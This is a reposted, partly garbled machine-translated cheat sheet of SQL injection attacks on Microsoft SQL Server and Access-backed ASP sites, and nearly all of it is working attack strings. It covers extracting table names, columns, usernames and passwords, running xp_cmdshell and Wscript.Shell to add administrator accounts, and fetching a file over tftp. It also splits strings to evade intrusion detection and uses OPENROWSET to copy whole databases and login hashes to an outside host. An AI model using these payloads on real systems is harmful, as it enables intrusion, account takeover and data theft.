SQL Injection Summary

SQL injection Summary (highly recommended)

Repost
SQL Injection Summary (early from ' or ' 1 ' = ' 1)

Most important table name:
SELECT * from sysobjects
sysobjects ncsysobjects
sysindexes tsysindexes
syscolumns
Systypes
sysusers
sysdatabases
sysxlogins
sysprocesses


Some of the most important user names (existing in the default SQL database)
Public
Dbo
Guest (generally prohibited, or not authorized)
Db_sercurityadmin
Ab_dlladmin

Some default extensions


Xp_regaddmultistring
Xp_regdeletekey
Xp_regdeletevalue
Xp_regenumkeys
Xp_regenumvalues
Xp_regread
Xp_regremovemultistring
Xp_regwrite
Xp_availablemedia Drive Related
Xp_dirtree Directory
XP_ENUMDSN ODBC connection
Xp_loginconfig Server security Mode information
Xp_makecab Create a compressed volume
Xp_ntsec_enumdomains Domain Information
Xp_terminate_process The terminal process, give a PID

For example:
Sp_addextendedproc ' Xp_webserver ', ' C:\temp\xp_foo.dll '
EXEC xp_webserver
Sp_dropextendedproc ' Xp_webserver '
BCP "SELECT * FROM Test". Foo "Queryout c:\inetpub\wwwroot\runcommand.asp-c-slocalhost-usa-pfoobar
' GROUP by Users.id has 1=1-
' GROUP by Users.id, Users.username, Users.password, Users.privs have 1=1-
'; Insert into users values (666, ' attacker ', ' foobar ', 0xFFFF)-

Union select top 1 column_name from INFORMATION_SCHEMA. COLUMNS where table_name= ' logintable '-
Union select top 1 column_name from INFORMATION_SCHEMA. COLUMNS where table_name= ' logintable ' where column_name not in (' login_id ')-
Union select top 1 column_name from INFORMATION_SCHEMA. COLUMNS where table_name= ' logintable ' where column_name not in (' login_id ', ' login_name ')-
Union select top 1 login_name from logintable-
Union select top 1 password from logintable where login_name= ' Rahul '--
Construct statement: Query exists xp_cmdshell
' Union SELECT @ @version, 1,1,1--
and 1= (SELECT @ @VERSION)
and ' sa ' = (select System_user)
' Union select ret,1,1,1 from foo--
' Union Select min (username), 1,1,1 from users where username > ' A '-
' Union Select min (username), 1,1,1 from users where username > ' admin '-
' Union select password,1,1,1 from users where username = ' admin '--
and user_name () = ' dbo '
and 0<> (select USER_NAME ()-
; DECLARE @shell INT exec sp_oacreate ' Wscript.Shell ', @shell OUTPUT exec sp_oamethod @shell, ' run ', null, ' C:\WINNT ystem32\c md.exe/c net user swap 5245886/add '
and 1= (SELECT COUNT (*) from master.dbo.sysobjects where xtype = ' X ' and name = ' xp_cmdshell ')
; EXEC master.dbo.sp_addextendedproc ' xp_cmdshell ', ' Xplog70.dll '


1 = (%20select%20count (*)%20from%20master.dbo.sysobjects%20where%20xtype= ' x '%20and%20name= ' xp_cmdshell ')
and 1= (select Is_srvrolemember (' sysadmin ')) determines whether the SA permission
and 0<> (select top 1 paths from newtable)--Bauku Dafa
and 1= (select name from master.dbo.sysdatabases where dbid=7) obtains the library name (from 1 to 5 are system id,6 above can be judged)
Create a virtual directory E disk:
DECLARE @o int exec sp_oacreate ' Wscript.Shell ', @o out exec sp_OAMethod @o, ' run ', NULL, ' cscript.exe c:\inetpub\wwwroot\ Mkwebdir.vbs-w "Default Web Site"-V "E", "E:\"
Access properties: (with writing a webshell)
DECLARE @o int exec sp_oacreate ' Wscript.Shell ', @o out exec sp_OAMethod @o, ' run ', NULL, ' cscript.exe c:\inetpub\wwwroot\ Chaccess.vbs-a w3svc/1/root/e +browse '


and 0<> (SELECT COUNT (*) from master.dbo.sysdatabases where name>1 and dbid=6)
Submit dbid = 7,8,9 in turn .... Get more database names
and 0<> (select top 1 name from bbs.dbo.sysobjects where xtype= ' U ') bursts into a table assumed to be admin

and 0<> (select top 1 name from bbs.dbo.sysobjects where Xtype= ' U "and name Not in (' Admin ')) to get the other tables.
and 0<> (SELECT COUNT (*) from bbs.dbo.sysobjects where xtype= ' U ' and name= ' admin '
and uid> (str (ID)) The number of bursts to the UID is assumed to be 18779569 Uid=id
and 0<> (select top 1 name from Bbs.dbo.syscolumns where id=18779569) gets a field from admin, assuming user_id
and 0<> (select top 1 name from Bbs.dbo.syscolumns where id=18779569 and name does not
(' ID ',...)) To storm out the other fields.
and 0< (select user_id from BBS.dbo.admin where username>1) can get user name
You can get the password in turn ... Suppose there are fields such as user_id username, password, etc.

Show.asp?id=-1 Union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin
Show.asp?id=-1 Union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin
(The Union statement is popular everywhere, and access works well.)

Bauku Special tips::%5c= ' or '/and ' modify%5 submit
and 0<> (SELECT COUNT (*) from master.dbo.sysdatabases where name>1 and dbid=6)
and 0<> (select top 1 name from bbs.dbo.sysobjects where xtype= ' U ') gets the table name
and 0<> (select top 1 name from bbs.dbo.sysobjects where Xtype= ' U "and name not in (' address '))
and 0<> (SELECT COUNT (*) from bbs.dbo.sysobjects where xtype= ' U ' and name= ' admin ' and uid> (str (ID)) to determine the ID value
and 0<> (select top 1 name from BBS.dbo.syscolumns where id=773577794) all fields

Http://xx.xx.xx.xx/111.asp?id=3400;create table [dbo]. [Swap] ([Swappass][char] (255));--

http://xx.xx.xx.xx/111.asp?id=3400 and (select top 1 swappass from swap) =1
Create TABLE newtable (id int IDENTITY (1,1), paths varchar) Declare @test varchar () exec master. Xp_regread @rootkey = ' hkey_local_machine ', @key = ' system\currentcontrolset ervices\w3svc\parameters\virtual Roots\ ', @value_name = '/', values= @test OUTPUT insert INTO paths (path) values (@test)

Http://61.131.96.39/PageShow.asp? Tianname= Policy and Regulation &infoid={57c4165a-4206-4c0d-a8d2-e70666ee4e08};use%20master;declare%20@s%20%20int;exec%20sp_ Oacreate%20 "Wscript.Shell", @s%20out;exec%20sp_oamethod%20@s, "Run", NULL, "cmd.exe%20/c%20ping%201.1.1.1";--


Get the Web path d:\xxxx, Next:
Http://xx.xx.xx.xx/111.asp?id=3400;use ku1;--
http://xx.xx.xx.xx/111.asp?id=3400;create table cmd (str image);--


The traditional existence of xp_cmdshell testing process:
; exec master.. xp_cmdshell ' dir '
; exec master.dbo.sp_addlogin hax;--
; exec Master.dbo.sp_password null,hax,hax;--
; exec master.dbo.sp_addsrvrolemember Hax sysadmin;--
; Exec master.dbo.xp_cmdshell ' net user Hax 5258/workstations:*/times:all/passwordchg:yes/passwordreq:yes/active:yes /add ';--
; exec master.dbo.xp_cmdshell ' net localgroup Administrators Hax/add ';--
EXEC master.. Xp_servicecontrol ' start ', ' schedule '
EXEC master.. Xp_servicecontrol ' start ', ' Server '
http://www.xxx.com/list.asp?classid=1; DECLARE @shell INT exec sp_oacreate ' Wscript.Shell ', @shell OUTPUT exec sp_oamethod @shell, ' run ', null, ' C:\WINNT ystem32\c md.exe/c net user swap 5258/add '
;D eclare @shell INT exec sp_oacreate ' Wscript.Shell ', @shell OUTPUT exec sp_oamethod @shell, ' run ', null, ' C:\WINNT ystem32\ CMD.EXE/C net localgroup Administrators Swap/add '

Http://localhost/show.asp?id=1 '; EXEC master.. xp_cmdshell ' tftp-i youip get file.exe '-

declare @a sysname set @a= ' xp_ ' + ' Cmdshell ' exec @a ' dir c:\ '
declare @a sysname set @a= ' xp ' + ' _cm ' + ' Dshell ' exec @a ' dir c:\ '
;d eclare @a;set @a=db_name (); Backup database @a to disk= ' Your IP your shared directory bak.dat '
If you are limited, you can.
SELECT * FROM OPENROWSET (' SQLOLEDB ', ' server '; Sa '; ', ' select ' ' ok! ' ' exec master.dbo.sp_addlogin Hax ')
Traditional query constructs:
SELECT * FROM news where id= ... and topic= ... And .....
Admin ' and 1= (select COUNT (*) from [user] where username= ' victim ' and right (left (userpass,01), 1) = ' 1 ') and Userpass <&gt ;'
Select 123;--
; Use master;--
: A ' or name like ' fff% ';--shows a user named FFFF.
' And 1<> (select count (email) from [user]);--
; Update [users] set email= (select top 1 name from sysobjects where xtype= ' u ' and status>0) where name= ' FFFF ';--
Description
The above statement is to get the first user table in the database and place the table name in the FFFF user's mailbox field.
By looking at FFFF's user profile, you can get the first one to use the table called AD
And then get the ID of this table based on the table name ad
FFFF '; Update [users] set email= (select top 1 id from sysobjects where xtype= ' u ' and name= ' ad ') where name= ' FFFF ';--

You can get the name of the second table as follows.
FFFF '; Update [users] set email= (select top 1 name from sysobjects where xtype= ' u ' and id>581577110) where name= ' FFFF ';- -
FFFF '; Update [users] set email= (select top 1 count (IDs) from password) where name= ' FFFF ';--
FFFF '; Update [users] set email= (select top 1 pwd from password where id=2) where name= ' FFFF ';--

FFFF '; Update [users] set email= (select top 1 name from password where id=2) where name= ' FFFF ';--

EXEC master.. Xp_servicecontrol ' start ', ' schedule '
EXEC master.. Xp_servicecontrol ' start ', ' Server '
Sp_addextendedproc ' Xp_webserver ', ' C:\temp\xp_foo.dll '
Extended storage can be invoked in a generic way:
EXEC xp_webserver
Once this extended store has been executed, you can delete it like this:
Sp_dropextendedproc ' Xp_webserver '

Insert into users values (666, char (0x63) +char (0x68) +char (0x72) +char (0x69) +char (0x73), char (0x63) +char (0x68) +char ( 0x72) +char (0x69) +char (0x73), 0xFFFF)-

Insert into users values (667,123,123,0XFFFF)-

Insert into users values (123, ' admin '--', ' password ', 0xffff)-

; and user>0
;; and (select COUNT (*) from sysobjects) >0
;; and (select COUNT (*) from mysysobjects) >0//is an Access database

-----------------------------------------------------------some introductions that are usually injected:
A id=49 the parameters of this type of injection are numeric, and the SQL statement looks like this:
SELECT * from table name where field =49
The injected parameter is id=49 and [query condition], that is, the build statement:
SELECT * from table name where field =49 and [query criteria]

(B) class= series The parameters of such injections are character types, and the original SQL statements are roughly as follows:
SELECT * from table name where field = ' Soap series '
The injected parameters are the class= series ' and [query conditions] and ' = ', that is, the generated statement:
SELECT * from table name where field = ' serials ' and [query conditions] and ' = '
(C) When the search does not filter the parameters, such as the keyword= keyword, the original SQL statement is roughly as follows:
SELECT * from table name where field like '% keyword% '
The injected parameter is keyword= ' and [query condition] and '%25 ' =, that is, the build statement:
SELECT * from table name where field like '% ' and [query condition] and '% ' = '% '
;; and (select top 1 name from sysobjects where xtype= ' U ' and status>0) >0
sysobjects is a SQL Server system table that stores all table names, views, constraints, and other objects, xtype= ' U ' and status>0, the name of the table that the user creates, and the above statement takes the first table name out and compares it to 0. Let the error message expose the table name.
;; and (select top 1 col_name (object_id (' table name '), 1) from sysobjects) >0
After you get the table name from ⑤, use object_id (' table name ') to get the internal id,col_name (table name id,1) of the table name to represent the 1th field name of the table, and replace 1 with 2,3,4 ... you can get the name of the field in the puzzle sheet one by one.


Post.htm content: The main is to facilitate input.
<iframe name=p src=# width=800 height=350 frameborder=0></iframe>
<br>
<form action=http://test.com/count.asp target=p>
<input name= "id" value= "1552;update AAA set aaa= (select top 1 name from sysobjects where xtype= ' u ' and status>0);--" style= "width:750" >
<input type=submit value= ">>>" >
<input Type=hidden name=fno value= "2, 3" >
</form>
Name of his data table:
Id=1552;update AAA Set Aaa= (select top 1 name from sysobjects where xtype= ' u ' and status>0);--
This is where the first table name is updated to the AAA field.
read out the first table, and the second table can be read in this way (plus and name<> ' The name of the table ' just obtained) after the condition.
Id=1552;update AAA Set Aaa= (select top 1 name from sysobjects where xtype= ' u ' and status>0 ' name<> ');--
Then id=1552 and exists (SELECT * from AAA where aaa>5)
read out the second table, ^^ ^^ ^^ read each one, until it is not so far.
Read the field like this:
Id=1552;update AAA Set Aaa= (select top 1 col_name (object_id (' table name '), 1);--
Then id=1552 and exists (SELECT * from AAA where aaa>5) error, get field name
Id=1552;update AAA Set Aaa= (select top 1 col_name (object_id (' table name '), 2);--
Then id=1552 and exists (SELECT * from AAA where aaa>5) error, get field name
--------------------------------Advanced Techniques:
[Get data table name] [Update the field value to the table name, and then try to read out the value of the field to get the table name]
Update table name Set field = (select top 1 name from sysobjects where xtype=u and status>0 [and name<> ' you get table name ' Find one plus one]) [w Here conditions]
Select top 1 name from sysobjects where Xtype=u and status>0 and name not in (' Table1 ', ' table2 ',...)
Build database administrator account and system administrator account through SQL Server Injection vulnerability [current account must be sysadmin group]

[Get Data table field name] [Update the field value to the field name, and then try to read out the value of the field to get the field name]
Update table name Set field = (select top 1 col_name (object_id (' data table name to query '), field column as: 1) [Where condition]

Bypass IDs detection [using variables]
declare @a sysname set @a= ' xp_ ' + ' Cmdshell ' exec @a ' dir c:\ '
declare @a sysname set @a= ' xp ' + ' _cm ' + ' Dshell ' exec @a ' dir c:\ '


1, open the remote database
Basic syntax
SELECT * FROM OPENROWSET (' SQLOLEDB ', ' server=servername;uid=sa;pwd=apachy_123 ', ' select * FROM table1 ')
Parameters: (1) OLE DB Provider name
2, where the connection string parameter can be any and port used to connect, such as
SELECT * FROM OPENROWSET (' SQLOLEDB ', ' uid=sa;pwd=apachy_123; NETWORK=DBMSSOCN; address=202.100.100.1,1433 ', ' select * from table '

To replicate the entire database of the target host, first set up a connection on the target host to the database on your machine (how to establish a remote connection on the target host, just now), and then insert all the remote tables to the local table.

Basic syntax:
Insert INTO OPENROWSET (' SQLOLEDB ', ' server=servername;uid=sa;pwd=apachy_123 ', ' select * to table1 ') SELECT * FROM Table2
This line of statements copies all the data from the Table2 table on the target host to the Table1 table in the remote database. In practice, the IP address and port of the connection string are appropriately modified to point to where needed, such as:
Insert INTO OPENROWSET (' SQLOLEDB ', ' uid=sa;pwd=apachy_123; NETWORK=DBMSSOCN; address=202.100.100.1,1433 ', ' select * FROM table1 ') SELECT * from Table2

Insert INTO OPENROWSET (' SQLOLEDB ', ' uid=sa;pwd=hack3r; NETWORK=DBMSSOCN; address=202.100.100.1,1433 ', ' select * from _sysdatabases ')
SELECT * FROM master.dbo.sysdatabases

Insert INTO OPENROWSET (' SQLOLEDB ', ' uid=sa;pwd=hack3r; NETWORK=DBMSSOCN; address=202.100.100.1,1433 ', ' select * from _sysobjects ')
SELECT * FROM User_database.dbo.sysobjects

Insert INTO OPENROWSET (' SQLOLEDB ', ' uid=sa;pwd=apachy_123; NETWORK=DBMSSOCN; address=202.100.100.1,1433 ', ' select * from _syscolumns ')
SELECT * FROM User_database.dbo.syscolumns

After that, you can see the target host's library structure from the local database, which is a cinch, not to say, to replicate the database:
Insert INTO OPENROWSET (' SQLOLEDB ', ' uid=sa;pwd=apachy_123; NETWORK=DBMSSOCN; address=202.100.100.1,1433 ', ' select * FROM table1 ') SELECT * from database. Table1

Insert INTO OPENROWSET (' SQLOLEDB ', ' uid=sa;pwd=apachy_123; NETWORK=DBMSSOCN; address=202.100.100.1,1433 ', ' select * from table2 ') SELECT * from database. Table2

......

3, complex 4, Hassi (HASH)

This is actually an extended application of the above 5 database. The hash of the login password is stored in the sysxlogins. The method is as follows:
Insert INTO OPENROWSET (' SQLOLEDB ', ' uid=sa;pwd=apachy_123; NETWORK=DBMSSOCN; address=202.100.100.1,1433 ', ' select * from _sysxlogins ') SELECT * from Database.dbo.sysxlogins
After getting the hash, 6, can be violent crack. It takes a bit of luck and a lot of time.


Ways to traverse a directory:
Create a temporary table first: Temp
' 5;create table temp (id nvarchar (255), Num1 nvarchar (255), num2 nvarchar (255), num3 nvarchar (255));--
5 '; Insert temp exec master.dbo.xp_availablemedia;--get all current drives
5 '; INSERT into temp (ID) Exec master.dbo.xp_subdirs ' c:\ ';--Get subdirectory list
5 '; INSERT into temp (ID,NUM1) exec master.dbo.xp_dirtree ' c:\ ';--Get the directory tree structure of all subdirectories and inch into temp table

5 '; INSERT into temp (ID) Exec master.dbo.xp_cmdshell ' type c:\web\index.asp ';--View the contents of a file
5 '; INSERT into temp (ID) exec master.dbo.xp_cmdshell ' dir c:\ ';--
5 '; INSERT into temp (ID) exec master.dbo.xp_cmdshell ' dir c:\ *.asp/s/a ';--
5 '; INSERT into temp (ID) exec master.dbo.xp_cmdshell ' cscript C:\Inetpub\AdminScripts\adsutil.vbs enum w3svc '

5 '; INSERT into temp (ID,NUM1) exec master.dbo.xp_dirtree ' c:\ ';--(Xp_dirtree applicable permissions public)
Write to table:
Statement 1:http://www.xxxxx.com/down/list.asp?id=1 and 1= (select Is_srvrolemember (' sysadmin '));--
Statement 2:http://www.xxxxx.com/down/list.asp?id=1 and 1= (select Is_srvrolemember (' serveradmin '));--
Statement 3:http://www.xxxxx.com/down/list.asp?id=1 and 1= (select Is_srvrolemember (' setupadmin '));--
Statement 4:http://www.xxxxx.com/down/list.asp?id=1 and 1= (select Is_srvrolemember (' securityadmin '));--
Statement 5:http://www.xxxxx.com/down/list.asp?id=1 and 1= (select Is_srvrolemember (' securityadmin '));--
Statement 6:http://www.xxxxx.com/down/list.asp?id=1 and 1= (select Is_srvrolemember (' diskadmin '));--
Statement 7:http://www.xxxxx.com/down/list.asp?id=1 and 1= (select Is_srvrolemember (' bulkadmin '));--
Statement 8:http://www.xxxxx.com/down/list.asp?id=1 and 1= (select Is_srvrolemember (' bulkadmin '));--
Statement 9:http://www.xxxxx.com/down/list.asp?id=1 and 1= (select Is_member (' db_owner '));--
Write the path to the table:
Http://www.xxxxx.com/down/list.asp?id=1;create table dirs (Paths varchar (), id int)-
Http://http://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_dirtree ' c:\ '-
Http://http://www.xxxxx.com/down/list.asp?id=1 and 0<> (select top 1 paths from dirs)-
Http://http://www.xxxxx.com/down/list.asp?id=1 and 0<> (select top 1 paths to dirs where paths not in (' @Inetpub ')) -
Statement: Http://http://www.xxxxx.com/down/list.asp?id=1;create table dirs1 (Paths varchar (), ID int)--
Statement: Http://http://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_dirtree ' e:\web '--
Statement: Http://http://www.xxxxx.com/down/list.asp?id=1 and 0<> (select top 1 paths from dirs1)-
Back up the database to the Web directory: Download
http://http://www.xxxxx.com/down/list.asp?id=1;declare @a sysname; Set @a=db_name (); Backup database @a to disk= ' E:\web\down.bak ';--


And%201= (Select%20top%201%20name%20from (Select%20top%2012%20id,name%20from%20sysobjects%20where%20xtype=char) ( ))%20t%20order%20by%20id%20desc)
And%201= (Select%20top%201%20col_name (object_id (' User_login '), 1)%20from%20sysobjects) refer to the related table.
and 1= (Select%20user_id%20from%20user_login)
and%200= (select%20user%20from%20user_login%20where%20user>1)